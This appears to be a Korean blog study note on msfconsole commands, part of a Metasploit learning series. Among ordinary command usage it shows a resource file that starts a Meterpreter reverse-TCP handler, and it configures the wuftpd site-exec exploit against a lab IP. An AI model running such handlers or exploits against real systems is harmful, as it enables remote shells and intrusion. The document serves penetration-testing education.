■ color 명령어
msf > help color
color <'true' |'false' |'auto'>
false 색 표시 X
auto 색 표시 O
msf > color false
msf > banner
msf > color auto
msf > banner
■ edit 명령어
msf > help edit
편집 할 때 사용
msf > use auxiliary/scanner/rservices/rlogin_login
msf auxiliary(rlogin_login) > edit
##
#
#.....코드를 확인할 수 있는 편집기
내용을 확인할 수 있다.
:q!
msf auxiliary(rlogin_login) > back
msf >
■ info 명령어
msf > help info
msf > search rlogin
msf > info auxiliary/scnner/rservices/rlogin_login
....rlogin프로그램에 대한 내용 출력
msf > use auxiliary/scanner/rservices/rlogin_login
msf auxiliary(rlogin_login) > info
모드를 선택한 상태에서 info 를 치면 선택되어 있는 모드에 대한 정보가 출력된다.
msf auxiliary(rlogin_login) > back
msf >
■ irb 명령어
msf > help irb
msf > irb
...
>> puts "hello, metasploit!" <-- put : 출력명령어 (bash shell 의 echo와 같음)
hello, metasploit!
-> nil
>> Framework::Version
-> "4.11 .5-2016010401"
>> quit
msf >
루비 언어로 만들어져 있어서 관련 쉘(irb)을 사용 할 수 있다.
■ jobs 명령어
msf > help jobs
...
msf > resource /root/bin/reverse_resource.rc msfconsole -r reverse_resource.rc
/root/bin/reverse_resource.rc 생성
# mkdir -p /root/bin
# cd /root/bin
# vi reverse_resource.rc
use exploit/mulit/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.20.50
set ExitSession false
exploit -j -z
미리 만들어 놓은 파일
msf exploit(handler) > ...
<ENTER>
msf exploit(handler) > jobs
백그라운드 작업 확인
jobs
==
id name payload LPORT
0 exploit: multi/handler windows... 4444
msf exploit(handler) > back
msf >
OPTIONS
-K 모든 백그라운드를 해제 할 수 있다.
■ kill 명령어
msf > help kill
msf > jobs
...
msf > kill 0
msf > jobs
없다.
■ resource 명령어
msf > help resource
msf > resource /root/bin/reverse_resource.rc
미리 만들어 있는 파일
msf exploit(handler) > exit
# echo version > version.rc
# msfconsole -q -r version.rc
■ route 명령어
msf > help route
....
EX) meterpreter > route
■ search 명령어**
msf > help search
Keywords:
app : Modules that are client or server attacks
author : Modules written by this author
bid : Modules with a matching Bugtraq ID
cve : Modules with a matching CVE ID
edb : Modules with a matching Exploit-DB ID
name : Modules with a matching descriptive name
osvdb : Modules with a matching OSVDB ID
platform : Modules affecting this platform
ref : Modules with a matching ref
type : Modules of a specific type (exploit, auxiliary, or post)
Examples:
msf > search usermap_script
msf > search name:mysql
msf > search platform:aix
msf >search type:post
■ sessions 명령어
msf > help sessions
■ set/unset 명령어
변수 설정 <변수이름 값>
msf > help set
msf > help unset
msf > search wuftpd
....
msf > use exploit/mulit/ftp/wuftpd_site_exec_format
설정 확인
msf exploit(wuftpd_site_exec_format) > show options
설정 등록
msf exploit(wuftpd_site_exec_format) > set RHOST 192.168.10.134
msf exploit(wuftpd_site_exec_format) > set FTPPASS jang4sc@hanmail.net
msf exploit(wuftpd_site_exec_format) > show options
설정 제거
msf exploit(wuftpd_site_exec_format) > unset RHOST
msf exploit(wuftpd_site_exec_format) > show options
모두 제거
msf exploit(wuftpd_site_exec_format) > unset all
msf exploit(wuftpd_site_exec_format) > set
-----------------------------------------------
Global
=====
No entries in data store. 데이터 스토어 에는 다 지워져서 없다.
Module: multi/ftp/wuftpd_site_exec_format
name value
........ ........
-----------------------------------------------
msf exploit(wuftpd_site_exec_format) > back
msf >
■ show 명령어
msf > help show
msf > show all msf > show encoders msf > show exploits msf > show payloads msf > show auxiliary msf > show options |
msf > use exploit/multi/ftp/wuftpd_site_exec_format
msf exploit(wuftpd_site_exec_format) > show options
.....옵션 출력
msf exploit(wuftpd_site_exec_format) > show targets
....
msf exploit(wuftpd_site_exec_format) > show advance
....
msf exploit(wuftpd_site_exec_format) > set
'Learning > └◆Metasploit' 카테고리의 다른 글
metasploit 05. 메타스플로잇을 이용한 서비스 취약점 점검 (0) | 2017.01.04 |
---|---|
metasploit 04 zenmap을 통해 포트스캔된 정보를 metasploit에서 읽기 (0) | 2017.01.04 |
metasploit 02 명령어 및 사용법 (0) | 2017.01.04 |
metasploit 01 개요 (0) | 2017.01.04 |